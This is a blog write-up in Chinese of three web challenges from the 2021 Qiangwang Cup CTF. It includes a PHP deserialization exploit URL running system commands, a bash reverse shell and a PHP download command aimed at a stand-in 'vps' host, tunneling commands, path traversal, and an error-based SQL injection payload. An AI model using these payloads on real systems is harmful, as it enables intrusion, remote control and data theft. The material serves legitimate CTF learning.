2021强网杯

2021-06-14 21:06:00
ctf - qwb

强网先锋就不写了,写写我做出来的三个解数比较多的题。

pop_master

题目内容:听说你是pop链构建大师?

16万行混淆代码:

其实这题一开始@gq已经做出来了,谁能想到靶机一开代码重新混淆了。。。

这题其实还挺有意思的(如果会写脚本的话),但是我跟一半了感觉差不多了,懒得写脚本只能继续跟,多少是有点费眼睛。

同时我感觉其他题没什么思路,于是从12点跟到15点跟出来一条链:

<?php

include "class.php";

$o = new cdKBgX();
$b = "phpinfo();//";

$o->IG2X7eS = new guAeB0;
$o->IG2X7eS->LTo0wOs = new MZ2dMV;
$o->IG2X7eS->LTo0wOs->WU6aUWm = new nXKQYP;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd = new r6lSwy;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac = new UW5vkV;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f = new DqoC5G;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X = new TBFTL7;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H = new qoEd8u;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX = new fFEGgM;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL = new rn4PNR;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS = new pRM5G8;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m = new Bwn3ZW;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO = new saCGME;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi = new ubPVyV;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl = new b8WIcp;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp = new q4IoOD;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d = new be3fZl;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac = new x9wgH7;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac->IBILkhN = new Upele5;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac->IBILkhN->cl73VwG = new uQhKsL;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac->IBILkhN->cl73VwG->RwqayHu = new G6QyEc;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac->IBILkhN->cl73VwG->RwqayHu->Ew9nqoI = new BmAQQY;


echo serialize($o);

Exp:

http://eci-2zeir9lncwqmfgk2txz6.cloudeci1.ichunqiu.com/?pop=O:6:"cdKBgX":1:{s:7:"IG2X7eS";O:6:"guAeB0":1:{s:7:"LTo0wOs";O:6:"MZ2dMV":1:{s:7:"WU6aUWm";O:6:"nXKQYP":1:{s:7:"mGpVYwd";O:6:"r6lSwy":1:{s:7:"q6VMPac";O:6:"UW5vkV":1:{s:7:"XlZSk2f";O:6:"DqoC5G":1:{s:7:"qd1Gk6X";O:6:"TBFTL7":1:{s:7:"z2qMn5H";O:6:"qoEd8u":1:{s:7:"BmsS1eX";O:6:"fFEGgM":1:{s:7:"uXVxFLL";O:6:"rn4PNR":1:{s:7:"TdVPKPS";O:6:"pRM5G8":1:{s:7:"k6WTa5m";O:6:"Bwn3ZW":1:{s:7:"PmYsubO";O:6:"saCGME":1:{s:7:"c449DBi";O:6:"ubPVyV":1:{s:7:"lgNpoOl";O:6:"b8WIcp":1:{s:7:"OkOSSwp";O:6:"q4IoOD":1:{s:7:"Wqcdf7d";O:6:"be3fZl":1:{s:7:"NaHb7Ac";O:6:"x9wgH7":1:{s:7:"IBILkhN";O:6:"Upele5":1:{s:7:"cl73VwG";O:6:"uQhKsL":1:{s:7:"RwqayHu";O:6:"G6QyEc":1:{s:7:"Ew9nqoI";O:6:"BmAQQY":1:{s:7:"UFAlT9K";N;}}}}}}}}}}}}}}}}}}}}}}}&argv=system("cat /flag");//

Hard_Penetration

题目内容:渗透测试主要以获取权限为主,这一次,你能获取到什么权限呢。

前面是一个shiro反序列化,正巧最近在看shiro,简单试了下是默认密钥,urldns链能到dnslog,之后试了下几条链没执行到命令,还以为会是什么新链,不过没泄露源码或者其他信息又不太可能,后面被队友告知用shiro_attack可以直接打通,裂开了。

看了下flag没权限,没法直接弹shell,套一层bash后就可以了,弹个shell:

bash -c 'bash -i >/dev/tcp/vps/port 2>&1 0>&1'

传了linpeas上去收集信息,收集到的信息有:

  • 内网8005端口有个apache,运行了一个cms
  • 机器上有php、python3等
  • flag只需www-data权限即可读

php上传ew:

php -r "file_put_contents('ew',file_get_contents('http://vps/ew_linux_x64'));"

转发端口:

./ew_linux_x64 -s lcx_listen -l 18888 -e 18889
./ew -s lcx_slave -d vps -e 18889 -f  127.0.0.1 -g 8005

翻了下是baocms,github上有唯一一份源码,审半天一直在看phpunit,后门从php://input改为了php://stdin,于是找到了这一篇:https://www.imperva.com/blog/the-resurrection-of-phpunit-rce-vulnerability/

不过没找到实际利用案例,而且就这个解题数量不太实际呀。。

于是重新审了一下cms,最后找到了个任意文件读。

直接读flag:

/wap/common/show?templateFile=../../../../../../flag

easyweb

题目来源于某次帮朋友测试项目的渗透过程,非常非常简单,没有新的知识点,已经去掉了很多需要脑洞猜测的部分,不过依然需要进行一些信息收集工作。So~ Be Patient~And have

这题没什么难点,就是卡到了找不到第二个站点的文件上传点,首先在:http://47.104.136.46/files/拿到hint:

Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password are located
Table: employee

扫下端口在36842还有一处登陆点,稍微试了下,无任何过滤,直接报错注入出密码:

password=admin&username=admin'or 1=extractvalue(1,concat(0x7e,mid((select password from employee),16)))#

pass:

admin/99f609527226e076d668668582ac4420

在站里面游走半天,看别的师傅一直在日站,还以为能蹲一手flag上车,结果没蹲到,而且站点名字叫easyssrf,多少是有点误导性,导致我一直在站点的那几个功能中找ssrf的点,过了很久才发现这个破站还有个/file路径,可以文件上传,简单绕一下过滤:

写shell后ps -ef看到内网有个jboss,是用root启动的,8006端口,拿ew转发出来后,发现是个默认界面,上github搜到了个利用脚本jexboss,直接一把梭:



本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号